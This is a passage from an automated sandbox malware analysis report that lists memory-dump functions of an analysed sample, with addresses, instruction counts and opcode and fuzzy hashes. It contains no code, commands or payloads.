                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8eb996a8028c6cb601d16e333dec21517f93e5df9a7837351d179e40dff4338c
                                                                                          • Instruction ID: a8348156fecd196cf69d0e4e04c797e8f8524ab305e3a6d109a7f5376adcde69
                                                                                          • Opcode Fuzzy Hash: 8eb996a8028c6cb601d16e333dec21517f93e5df9a7837351d179e40dff4338c
                                                                                          • Instruction Fuzzy Hash: 9311B170E043069FEB81DB79C8516BEBFF5AF84310F05846AC459D7341EB7499068BD6
                                                                                          Function 00C2D753 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249279490.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c2d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                          • Instruction ID: 1302db011c4d68fac3b534be039fcdbc07fe3be6bd5710adfe10e586039f5f29
                                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                          • Instruction Fuzzy Hash: 9811D376904280CFCB16CF14E5C4B16BF71FBA4314F24C5A9D90A0B656C33AD95ACBA2
                                                                                          Function 06E7127C Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5836f595fd923d52ceb811942c5910b208599ef6b2a9e68f7c7a04378ceef85
                                                                                          • Instruction ID: 978aa2e2a9856973501b4de1fbf0b5c2e60858a1589d2db9655581e38da4c864
                                                                                          • Opcode Fuzzy Hash: d5836f595fd923d52ceb811942c5910b208599ef6b2a9e68f7c7a04378ceef85
                                                                                          • Instruction Fuzzy Hash: 88118272D116099BCB00DFA9D9805DDFBB5EF99310F158626E510B7250EB703A4ACB51
                                                                                          Function 00C3D1C7 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249314007.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c3d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                          • Instruction ID: 15e9cfa8b17c530cac4f15ffa682a23e40f121c70a33fde2817bccb598ce274e
                                                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                          • Instruction Fuzzy Hash: 3F11DD75904280DFDB01CF10E5C4B16BBB1FB84314F24C6A9D84A4B656C33BD95ACB61
                                                                                          Function 06E71290 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3071fcd04e8ce84e4127dfd81543cc1f9a9cf301f9cee05499d8875666760ab8
                                                                                          • Instruction ID: 7e04fcabfee3d4e9058ea105da3aafb52b40b9998be5a0122007efd923d2afa4
                                                                                          • Opcode Fuzzy Hash: 3071fcd04e8ce84e4127dfd81543cc1f9a9cf301f9cee05499d8875666760ab8
                                                                                          • Instruction Fuzzy Hash: 22019632D1060E9BCF00DFA9D8804CDFBB5EF99310F214626E51077250EB703A46CB91
                                                                                          Function 06E70848 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a7867a4c62834a2b645ef55d72d0fb8570d2c7de5dba2f66d435349bd4ccd11
                                                                                          • Instruction ID: 248e25ad4c0685264979a0bbfe096d63de4d73cb796d491d15c84fe387370592
                                                                                          • Opcode Fuzzy Hash: 5a7867a4c62834a2b645ef55d72d0fb8570d2c7de5dba2f66d435349bd4ccd11
                                                                                          • Instruction Fuzzy Hash: A701AD71F002019FEB55DB69D841ABFBBF29AC8354B459029C599D7350EB34EC028BD6
                                                                                          Function 00C2D15D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249279490.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c2d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34758b51792178706eb7f3f6ede7c25cb8ade845c40b0a02a3b68035194611ca
                                                                                          • Instruction ID: 33db600287b4cbeb67294119d0035532c3fd09d61c5f5688bdc33443f080f8e1
                                                                                          • Opcode Fuzzy Hash: 34758b51792178706eb7f3f6ede7c25cb8ade845c40b0a02a3b68035194611ca
                                                                                          • Instruction Fuzzy Hash: C0012B710053109EE7109E16ECC476BBF98DF61370F28C85AEC1A0AA86C3349844C671
                                                                                          Function 06E71317 Relevance: .0, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25d5ae57953bb0aa9c9f6363c96906581cfda44a81ac96713b57ac9e56ec6b6a
                                                                                          • Instruction ID: 5f397227e574c3590cec96e410d94e2e1dce1389a8ae4c3a4b96539a7dfc02a9
                                                                                          • Opcode Fuzzy Hash: 25d5ae57953bb0aa9c9f6363c96906581cfda44a81ac96713b57ac9e56ec6b6a
                                                                                          • Instruction Fuzzy Hash: BAF0F636910349ABDF04AB70C815AEFBFB69F44300F458429D512A7340DE74590B87E2
                                                                                          Function 00C2D15C Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249279490.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c2d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f08af88dd079fabb46e778eb681d1ec3128aafadd524a750caa55c93a5df513d
                                                                                          • Instruction ID: f8bd1633b1f7a8efaf274e6e822cc1ed320d093a71a4fd75d6a0c4cd82b7c95a
                                                                                          • Opcode Fuzzy Hash: f08af88dd079fabb46e778eb681d1ec3128aafadd524a750caa55c93a5df513d
                                                                                          • Instruction Fuzzy Hash: CEF0F671404340AEE7108E15ED84B67FFA8EF51734F18C45AED191B696C3789C44CB71
                                                                                          Function 06E7211B Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a03abd6eaefdcbcb109e98d21e38e8323f5b51a4d18d2d13eb1e860aaa47f9b6
                                                                                          • Instruction ID: ce6f5c89ae65a89ea4e8c51c63f5c55965427e8fde5b1eeb8bf973ba61c29641
                                                                                          • Opcode Fuzzy Hash: a03abd6eaefdcbcb109e98d21e38e8323f5b51a4d18d2d13eb1e860aaa47f9b6
                                                                                          • Instruction Fuzzy Hash: 90F0E9316003518FCB14E7A4E8017DDB7B3EB84314F10492DE58617252CF7AB95687B2
                                                                                          Function 06E71FE7 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64257f626475293adb9163613dcc825306e9ecdbaad7164a7e9e38163f47a978
                                                                                          • Instruction ID: 8e2bb3927c808db08f8c9c9ac900e305f17be8fd743cbca67c7232d45d98b6bd
                                                                                          • Opcode Fuzzy Hash: 64257f626475293adb9163613dcc825306e9ecdbaad7164a7e9e38163f47a978
                                                                                          • Instruction Fuzzy Hash: 7BD02B373002001FCB314655B840EBF7B979FC4311B04412DEA0EC7660CB6298419700
                                                                                          Function 06E71FE8 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5cd5ccae262929a468d4554dd9368decfad5c49dec40a4cb3db5bcc5650c43b7
                                                                                          • Instruction ID: 92ae291e4f96210ba8a858d0b01d7613cdf7e81f60bf7febde7ecbcfb6977cd3
                                                                                          • Opcode Fuzzy Hash: 5cd5ccae262929a468d4554dd9368decfad5c49dec40a4cb3db5bcc5650c43b7
                                                                                          • Instruction Fuzzy Hash: E9D05B373007015BCA255656E944E6B779F9BC4725B044029EB1DC7650DB62A8419750

                                                                                          Non-executed Functions

                                                                                          Function 06D0DB25 Relevance: .3, Instructions: 282COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f317c7033fddc58f008356436f4551ca9252617004b931c1f41e02f6f61aafe
                                                                                          • Instruction ID: 5a96197efca9c8b5aa7f8bd184f22a8182a746e277f89006b829e8923f605734
                                                                                          • Opcode Fuzzy Hash: 8f317c7033fddc58f008356436f4551ca9252617004b931c1f41e02f6f61aafe
                                                                                          • Instruction Fuzzy Hash: 9ED1BE74E012198FDB54CFA4C998AADFBF2FF48201F15CA6AD416AB291D335D881CF91
                                                                                          Function 06D01EE0 Relevance: .3, Instructions: 272COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f02e76f2f7e788b9a754b0d50edb087b7036c9355d0ee157bc8c5f414f4cda7
                                                                                          • Instruction ID: 23c557c7f5450f870b3e771d588b7e7541f87accf02bb42a1d89f96ac66c69f1
                                                                                          • Opcode Fuzzy Hash: 7f02e76f2f7e788b9a754b0d50edb087b7036c9355d0ee157bc8c5f414f4cda7
                                                                                          • Instruction Fuzzy Hash: 98D1F731C2075A8ECB11EBA4D894ADDB771FF95300F609B9AE0097B251EF706AC6CB51
                                                                                          Function 06D01EF0 Relevance: .3, Instructions: 264COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 866b212a8d4963d719089b7fa1e15537225515d8aa6d158ce06c7b77f19c60cb
                                                                                          • Instruction ID: a4cd46a2ad1fe584be5ba2b1d1502e6f8fa96066533b42468594fa15d93e9e1c
                                                                                          • Opcode Fuzzy Hash: 866b212a8d4963d719089b7fa1e15537225515d8aa6d158ce06c7b77f19c60cb
                                                                                          • Instruction Fuzzy Hash: 3BD1F631C2075A8ECB11EBA4D894ADDB771FF95300F609B9AE0093B251EF706AC9CB51
                                                                                          Function 00D355A7 Relevance: .3, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fee688f02c57b2a65bb44942c814be1fbd56dbb8ea64beeabd72b6bf470ecf52
                                                                                          • Instruction ID: 1b008d91be285dbf58d090b8ba938b7d970aa49ae589f7296abec7736a5cf232
                                                                                          • Opcode Fuzzy Hash: fee688f02c57b2a65bb44942c814be1fbd56dbb8ea64beeabd72b6bf470ecf52
                                                                                          • Instruction Fuzzy Hash: 73B1EB78A0020DDFDB08EFA4D994AAEBBB3FF89700F118428D5056B794CB359D52DB91
                                                                                          Function 00D355A8 Relevance: .3, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e1e23218f54ed748e581ff57b550591f55c8abc96f139b502ddc6061a8c0323d
                                                                                          • Instruction ID: c90cb05204efb6bf9e75bb1953c4d49bd39bb137086927f6cc9f7bccd889a6e0
                                                                                          • Opcode Fuzzy Hash: e1e23218f54ed748e581ff57b550591f55c8abc96f139b502ddc6061a8c0323d
                                                                                          • Instruction Fuzzy Hash: 1EB1FB78A0020DDFDB08EFA4D994AAEBBB3FF89700F118428D5056B794CB359D52DB91
                                                                                          Function 06D0FC28 Relevance: .2, Instructions: 240COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41184bf1614e132db193b6e1370871907cb0b4c8a9c7cd1ee7ecf967b4784732
                                                                                          • Instruction ID: 0053544ac2d5df90cee978255c4f65bc3140349a5df6ee91f7c82c1fb44d6081
                                                                                          • Opcode Fuzzy Hash: 41184bf1614e132db193b6e1370871907cb0b4c8a9c7cd1ee7ecf967b4784732
                                                                                          • Instruction Fuzzy Hash: DA91A570E012548FCB64CFA9C8846AEFBF2FF89300F24C55AD95597746C234E946CB64
                                                                                          Function 06D0DE77 Relevance: .2, Instructions: 226COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 22c3de4c92dc265338bbafaa6509ad14e26c792cf4fcef368a8228cd4dde8662
                                                                                          • Instruction ID: bba1798236e0a5739a02a4bd0acdf902f0681261456223ffe125ead767581c78
                                                                                          • Opcode Fuzzy Hash: 22c3de4c92dc265338bbafaa6509ad14e26c792cf4fcef368a8228cd4dde8662
                                                                                          • Instruction Fuzzy Hash: B8A1C074E012198FDB54CFA4C998AADFBF2FF49300F15CA6AD41A9B251D334E882CB41
                                                                                          Function 06D0FD70 Relevance: .2, Instructions: 157COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56a900edb894c7f1263c20ae7db8abac747667b45d2d934c4ffede5d9b006acc
                                                                                          • Instruction ID: e56a37585cd23f1c364b579c82f64e126a243d725ab138934f48b256deba9be2
                                                                                          • Opcode Fuzzy Hash: 56a900edb894c7f1263c20ae7db8abac747667b45d2d934c4ffede5d9b006acc
                                                                                          • Instruction Fuzzy Hash: 7E51F975E012199FCB48CFA9D885AAEFBF2FF88310F24C166E945E7345C634A941CB90